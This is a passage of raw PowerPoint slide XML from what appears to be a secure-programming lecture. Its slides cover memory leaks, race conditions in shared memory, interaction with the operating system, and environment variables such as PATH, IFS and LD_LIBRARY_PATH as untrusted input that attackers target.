            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Correct Use of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840739" y="1909074"/>
            <a:ext cx="8071484" cy="4726305"/>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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Issue of dynamic memory</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>allocation</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used to manipulate unknown amounts of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>data</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allocated when needed, released when</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>done</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Memory leak occurs if incorrectly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>released</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Many older languages have no explicit support</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for  dynamic memory</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>allocation</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rather </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use standard </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>library</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>functions</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programmer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ensures correct</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>allocation/release</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Modern </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>languages handle</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>automatically</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30</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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1861057" y="1099820"/>
            <a:ext cx="6333490" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Race Conditions in Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916939" y="2153665"/>
            <a:ext cx="7889240" cy="3555365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="318135" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>When multiple threads/processes access shared  data / memory</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Unless access synchronized can get corruption</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or  loss of changes due to overlapping</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>accesses…</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…so use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>suitable synchronization</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>primitives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correct </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>choice </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sequence </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>obvious</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Address </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the issue of access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>deadlock</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31</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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254755" y="1006855"/>
            <a:ext cx="3549015" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Interacting with</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>O/S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1871737"/>
            <a:ext cx="6924040" cy="4233545"/>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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Programs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>execute on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>systems </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>under</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>O/S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mediates </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and shares </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>access to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>resources</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constructs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>environment </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>variables </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>arguments</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Systems have multiple users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with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>permissions on resources </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>data</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Programs may access shared</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-40" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>resources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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>files</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32</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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994151" y="1006855"/>
            <a:ext cx="4070350" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Environment</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1909074"/>
            <a:ext cx="6900545" cy="4307205"/>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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Set of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>values inherited from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>parent</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can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>affect </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-50" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>behavior</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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PATH, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IFS,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-50" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LD_LIBRARY_PATH</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>can alter for its</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>children</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Another source </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of untrusted program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>input</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Attackers use to try to escalate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>privileges</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Privileged shell scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>targeted</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very </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>difficult </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>write safely </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-105" dirty="0">
